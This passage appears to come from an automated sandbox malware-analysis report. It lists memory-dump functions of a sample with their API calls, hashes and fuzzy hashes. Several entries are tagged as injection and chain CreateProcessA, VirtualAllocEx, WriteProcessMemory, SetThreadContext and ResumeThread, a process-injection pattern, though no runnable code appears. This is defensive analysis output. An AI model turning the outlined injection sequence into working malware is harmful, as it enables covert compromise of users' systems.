                                                                                                          • Instruction Fuzzy Hash: 2A019A76704515AFC700DFA8C880A9AF3E8FB8821070042A9E905C7301DB32ED60CBD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955FDB Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059562A7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: b672193d19f896bc6977721528f00b95598c2cc1e125766b67c639b3485e682b
                                                                                                          • Instruction ID: 1e42f006709c550f229790620d032f3d2459ee7bf72f66a789fda2c58f9c8f39
                                                                                                          • Opcode Fuzzy Hash: b672193d19f896bc6977721528f00b95598c2cc1e125766b67c639b3485e682b
                                                                                                          • Instruction Fuzzy Hash: 24C13370D002198FDF25CFA8C885BEEBBB1BB49310F0095A9E859B7250DB749A95CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955FE0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 059562A7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 32611eca36ebb1a804ff1e843799f20585cba261c2b05766956400754065664e
                                                                                                          • Instruction ID: aac9b093f3085e429facba8235fddc5aced9605b3589959d71da4f9ed14dab6d
                                                                                                          • Opcode Fuzzy Hash: 32611eca36ebb1a804ff1e843799f20585cba261c2b05766956400754065664e
                                                                                                          • Instruction Fuzzy Hash: 25C13370D002198FDF25CFA8CC85BEEBBB1BB49310F0095A9E859B7250DB749A95CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1579825452-0
                                                                                                          • Opcode ID: 5d57cf780de05f6e69768b81d578352c90a774077ad2243e58692490319e456c
                                                                                                          • Instruction ID: c9a686fdd3f03ed60eea7b18c6e8a2d2714f40bbc896228eefd72451d2ac25bd
                                                                                                          • Opcode Fuzzy Hash: 5d57cf780de05f6e69768b81d578352c90a774077ad2243e58692490319e456c
                                                                                                          • Instruction Fuzzy Hash: 1C81A1B1908382CFEB20DFB8CA8575EBBE0AF81714F54497ED1588B2D0E77598448B53
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955C51 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05955D2B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: fddacda203cb9ab3629c340bda76c95ca43f263d8ddc27bcfc0dce4b8070bef4
                                                                                                          • Instruction ID: e4b1274622d96ec1e89b9422da1db76a54962e648fa3093f9ef80beb7a55105f
                                                                                                          • Opcode Fuzzy Hash: fddacda203cb9ab3629c340bda76c95ca43f263d8ddc27bcfc0dce4b8070bef4
                                                                                                          • Instruction Fuzzy Hash: A041BBB5D012489FCF10CFA9D984AEEFBF5BB49310F24942AE815B7210D378AA55CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955C58 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05955D2B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: ea5b685ec7a038db2329f6d0fd4d867a92858eef170945c16c6b9fe1873e4e2d
                                                                                                          • Instruction ID: bd290b26922d4189ab979a59cdcfc61adc874f26b6db6c9e00535a45da77f0e2
                                                                                                          • Opcode Fuzzy Hash: ea5b685ec7a038db2329f6d0fd4d867a92858eef170945c16c6b9fe1873e4e2d
                                                                                                          • Instruction Fuzzy Hash: 4E41BBB5D012489FCF00CFA9D984AEEFBF5BB49310F24942AE814B7200D378AA45CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955DA8 Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05955E62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: 0a202214f8e0ea4efb58184e40c5ef9a0c877e239f65916e04d59b5c150db39e
                                                                                                          • Instruction ID: 711e33c76855e76d2f88c91ec076fc4dc5ff15bd092fa2c7277affacbf121835
                                                                                                          • Opcode Fuzzy Hash: 0a202214f8e0ea4efb58184e40c5ef9a0c877e239f65916e04d59b5c150db39e
                                                                                                          • Instruction Fuzzy Hash: EC41B9B5D002589FCF10CFAAD884AEEFBB5BB59320F10942AE815B7210D738A955CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955DB0 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05955E62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 1726664587-0
                                                                                                          • Opcode ID: 0b948a7b623245b6526d35a73e1ac74bbf4c0b1555651a8112eb94712604c9fc
                                                                                                          • Instruction ID: feb0bec0714c417a850811d99e1df25c023ab511a6c2d247d04d6784c7e2abb4
                                                                                                          • Opcode Fuzzy Hash: 0b948a7b623245b6526d35a73e1ac74bbf4c0b1555651a8112eb94712604c9fc
                                                                                                          • Instruction Fuzzy Hash: F641A8B5D00258DFCF10CFAAD884AEEFBB5BB59320F14942AE815B7210D738A945CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955B31 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05955BE2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 672eda3774625c94b07e8fe38113b878b1d8e645c30e2d8a0f9b5dc123ad0b41
                                                                                                          • Instruction ID: ea5d303ed62911dee57faff298ab9ffaae1de0fed1c69515d34e505a0f3b89cd
                                                                                                          • Opcode Fuzzy Hash: 672eda3774625c94b07e8fe38113b878b1d8e645c30e2d8a0f9b5dc123ad0b41
                                                                                                          • Instruction Fuzzy Hash: 6431B8B8D002489FCF10CFA9D884A9EFBB5BF59320F20942AE815B7300D735A945CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955B38 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05955BE2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: d4e332840540785036ad80443c6f7ba315444cb1f358f0bbfa246b0837a662bf
                                                                                                          • Instruction ID: 78e1c4e3550ba33b4108552371934b1c26c38adfde269250bb8741b432eeeb09
                                                                                                          • Opcode Fuzzy Hash: d4e332840540785036ad80443c6f7ba315444cb1f358f0bbfa246b0837a662bf
                                                                                                          • Instruction Fuzzy Hash: 2831A6B8D002489FCF10CFA9D984A9EFBB5BB59320F10A42AE815B7210D735A945CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955A08 Relevance: 1.6, APIs: 1, Instructions: 97threadinjectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetThreadContext.KERNELBASE(?,?), ref: 05955ABF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1591575202-0
                                                                                                          • Opcode ID: b51c27326787feb55cf3deae540331003269e87a4458f0d7d1f3d614f2f93ed7
                                                                                                          • Instruction ID: 7d9bebc8a29e5681d08d0ef651f81c8d75e1983bfbf040d0808dfea985094c78
                                                                                                          • Opcode Fuzzy Hash: b51c27326787feb55cf3deae540331003269e87a4458f0d7d1f3d614f2f93ed7
                                                                                                          • Instruction Fuzzy Hash: A241DEB5D002589FCB10CFA9D884AEEFBF5BF48324F24842AE815B7200C738A945CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955A10 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetThreadContext.KERNELBASE(?,?), ref: 05955ABF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1591575202-0
                                                                                                          • Opcode ID: f8692db604bffa4109be3aec33fdc36599081fbabc22ac55d7e85f3e897a0088
                                                                                                          • Instruction ID: 525203324e51e1a322098ee1269a9f92c68dacbb26a60568f504449569437fd7
                                                                                                          • Opcode Fuzzy Hash: f8692db604bffa4109be3aec33fdc36599081fbabc22ac55d7e85f3e897a0088
                                                                                                          • Instruction Fuzzy Hash: 6931CEB4D002589FCB10CFA9D884AEEFBF5BF58324F24842AE815B7200D778A945CF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F037140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F052820: _malloc.LIBCMT ref: 6F052871
                                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6F0371D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xweak_mallocstd::tr1::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 4085767713-0
                                                                                                          • Opcode ID: b4078f1a84ce1e9627a8a1b56b216defb6f1c7c95a4e976a1eee846b99ab8061
                                                                                                          • Instruction ID: d50fa3e5d80bac115158a3ea8d0e793c8322775283d7e4bac3f7160f7d044caf
                                                                                                          • Opcode Fuzzy Hash: b4078f1a84ce1e9627a8a1b56b216defb6f1c7c95a4e976a1eee846b99ab8061
                                                                                                          • Instruction Fuzzy Hash: 6B314DB6A0474ADFCB10CFA9C980BABB7F5BF49714B10865DE81697741D331B905CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0113B169 Relevance: 1.6, APIs: 1, Instructions: 82libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0113B20A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 6478ab3bfe5fd32989067b5395aaa637a9cda914e773d63f5b88b495b82e4ca6
                                                                                                          • Instruction ID: d08d83dad40ee1aa8a47c35a26aee867fcd7998202f4d071da7433692c710b3f
                                                                                                          • Opcode Fuzzy Hash: 6478ab3bfe5fd32989067b5395aaa637a9cda914e773d63f5b88b495b82e4ca6
                                                                                                          • Instruction Fuzzy Hash: 7231CDB4D042089FCB14CFA9D584ADEFBF5AF88310F14906AE818B7320D734A945CF68
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 011399B0 Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0113B20A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: 3a60f71467df6eb3e4fa74f50db931542e969ef08b4475acaca6f4f9ba5b1ea2
                                                                                                          • Instruction ID: aaa61b36f7d9cfad7d6e0cb579f6d3871c0905d43d7de02371bdb70be3a1be09
                                                                                                          • Opcode Fuzzy Hash: 3a60f71467df6eb3e4fa74f50db931542e969ef08b4475acaca6f4f9ba5b1ea2
                                                                                                          • Instruction Fuzzy Hash: 4031BCB4D042089FCB14CFA9D584AEEFBF5AF88310F14906AE818B7310D374A945CFA8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 011399BC Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0113B20A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.983923396.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_1130000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: fba316d28f647845ea9899dfc04dc253e374c77e682e4723a7fe2cd386389829
                                                                                                          • Instruction ID: 00542abc5e1bcc1b1ccbddf52fbd16c30713e5c7e2a13d1cddc2c8621974e121
                                                                                                          • Opcode Fuzzy Hash: fba316d28f647845ea9899dfc04dc253e374c77e682e4723a7fe2cd386389829
                                                                                                          • Instruction Fuzzy Hash: 2431BCB4D042089FCB14CFA9D584ADEFBF5AF89310F14906AE818B7310D374A945CF68
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955918 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ResumeThread.KERNELBASE(?), ref: 0595599E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: 72c3aa7354df032944cd766e430a420eb051902320941403ce55b2d6672937ba
                                                                                                          • Instruction ID: 167a844fcfb0c264f62a4f0e96b72d8729bbf82b449b52392a22f473108a020a
                                                                                                          • Opcode Fuzzy Hash: 72c3aa7354df032944cd766e430a420eb051902320941403ce55b2d6672937ba
                                                                                                          • Instruction Fuzzy Hash: 0431CEB4D012489FCF14CFA9D984AEEFBB5AF98324F14942AE815B7300C778A841CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 05955920 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ResumeThread.KERNELBASE(?), ref: 0595599E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985202481.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_5950000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ResumeThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: a40e10fc74969a5b44c5176c37277117b54f826c14d5e3f800155fcba400a543
                                                                                                          • Instruction ID: 1eea27de058f3bf7a1e179b15560cb962bbb0f0b55776a9f18f50b8a2a3bc672
                                                                                                          • Opcode Fuzzy Hash: a40e10fc74969a5b44c5176c37277117b54f826c14d5e3f800155fcba400a543
                                                                                                          • Instruction Fuzzy Hash: 1D31BDB4D012589FCF14CFA9D984A9EFBB5BF98320F14942AE815B7300D778A941CF64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0925C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F08CB3E,6F089BD4,?,00000000,00000000,00000000,?,6F08EA98,00000001,00000214), ref: 6F092606
                                                                                                            • Part of subcall function 6F08D7D8: __getptd_noexit.LIBCMT ref: 6F08D7D8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 328603210-0
                                                                                                          • Opcode ID: 55e3763cafef2606836c8f27d6d3ac2ca4d4b6e77cfea387fdae8ae71851894a
                                                                                                          • Instruction ID: 372a4f52143ec7259b0cc9ee0084e44f32558b036430899aeb01ba12a1dcdd41
                                                                                                          • Opcode Fuzzy Hash: 55e3763cafef2606836c8f27d6d3ac2ca4d4b6e77cfea387fdae8ae71851894a
                                                                                                          • Instruction Fuzzy Hash: F601B1312052159BEF149E25CD24F9A33E4BF82760F11562AE836CB5E0EB34E410A780
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • SysAllocString.OLEAUT32 ref: 6F04EA8D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocString_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 959018026-0
                                                                                                          • Opcode ID: 83ab3ccd85137101b510b6b73ad17837d0b6b3af497dd91130d8b7e13230a643
                                                                                                          • Instruction ID: 149f767cd694d5d1cf353063e24445eda930ddf816d4aa69388155d6828aa35a
                                                                                                          • Opcode Fuzzy Hash: 83ab3ccd85137101b510b6b73ad17837d0b6b3af497dd91130d8b7e13230a643
                                                                                                          • Instruction Fuzzy Hash: CE0192B1904B55EBD711CF94C900B5AF7F8FB05B24F10436AEC25A7380E7B5A910CAE0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F053160 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2102423945-0
